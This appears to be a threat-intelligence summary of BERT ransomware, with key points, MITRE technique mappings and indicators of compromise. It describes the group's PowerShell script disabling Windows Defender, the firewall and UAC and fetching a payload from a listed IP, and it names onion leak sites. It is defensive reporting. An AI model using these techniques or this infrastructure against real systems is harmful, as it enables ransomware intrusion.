BERT ransomware, active since mid-March 2025, targets both Windows and Linux systems using unique encryption methods and phishing attacks. The group operates data leak sites on the dark web and leverages PowerShell scripts to disable security features and deploy payloads from Russian-controlled infrastructure. #BERTRansomware #Revil #UNITEDNET
Keypoints
- BERT ransomware was first identified in April 2025 but has been active since mid-March 2025, initially targeting Windows and later expanding to Linux machines by May 2025.
- The ransomware group uses phishing as their primary infection vector and maintains victim data leak and storage sites on the dark web.
- Windows variants append unique extensions such as “encryptedbybert” and use RSA encryption, while the Linux variant shares 80% code similarity with Revil ransomware, using AES, RC4, Salsa20, and ChaCha encryption.
- The group disables Windows Defender, firewall, and User Account Control via a PowerShell script downloaded from an IP based in Sweden but linked to a Russian provider (UNITEDNET/Edinaya Set Limited).
- Ransom demands are made in Bitcoin, with communications conducted through private sessions rather than dedicated onion negotiation sites.
- Victims are mainly located in the US, UK, Malaysia, Taiwan, Colombia, and Turkey, affecting sectors like services, manufacturing, logistics, IT, and healthcare.
- The Windows ransomware samples include manipulated timestamps and use unique filenames such as newcryptor.exe, Bert, and Bert11.
MITRE Techniques
- [T1566] Phishing – BERT ransomware targets victims via phishing emails to initiate infection. (‘It is believed that they target their victims via Phishing.’)
- [T1086] PowerShell – The group uses PowerShell scripts to disable security features and execute payloads. (‘During the Investigation, I came across the Powershell file… disabling/downgrading Security and System Privileges.’)
- [T1543] Create or Modify System Process – The script disables or stops services such as Windows Defender and firewall services to weaken defenses. (‘It also attempts to stop security-related services (WinDefend, Sense) and disables Windows Firewall…’)
- [T1105] Ingress Tool Transfer – The ransomware downloads payload.exe from a remote server for execution. (‘It fetches an executable (payload.exe) from an external IP (185.100.157.74)’)
- [T1140] Deobfuscate/Decode Files or Information – The Linux variant encodes data using Base64 and applies various encryption algorithms. (‘Data are also encoded using Base64… Salsa20 and ChaCha algorithms are also observed.’)
- [T1486] Data Encrypted for Impact – Files are encrypted with extensions such as encryptedbybert using RSA and other encryption techniques. (‘The files are encrypted using RSA via WinAPI.’)
Indicators of Compromise
- [IP Address] Payload and PowerShell hosting server – 185.100.157.74 (linked to Swedish server but controlled by Russian provider UNITEDNET)
- [Domain] Dark Web leak sites – bertblogsoqmm4ow7nqyh5ik7etsmefdbf25stauecytvwy7tkgizhad.onion, wtwdv3ss4d637dka7iafl7737ucykei7pluzc7is3mgo2vl5nmq7eeid.onion
- [File Hashes] Windows sample with legitimate timestamp – MD5: 00fdc504be1788231aa7b7d2d1335893; plus other files with manipulated future timestamps
- [File Names] Unique ransomware executables – newcryptor.exe, Bert, Bert11, worker.exe, payload.exe, build.exe, build.exe.bin, ESXDSC04_bert11
- [File Extensions] Encrypted file suffixes – encryptedbybert, encryptedbybert3, encryptedbybert11, encrypted_bert, hellofrombert
Read more: https://theravenfile.com/2025/06/16/bert-ransomware/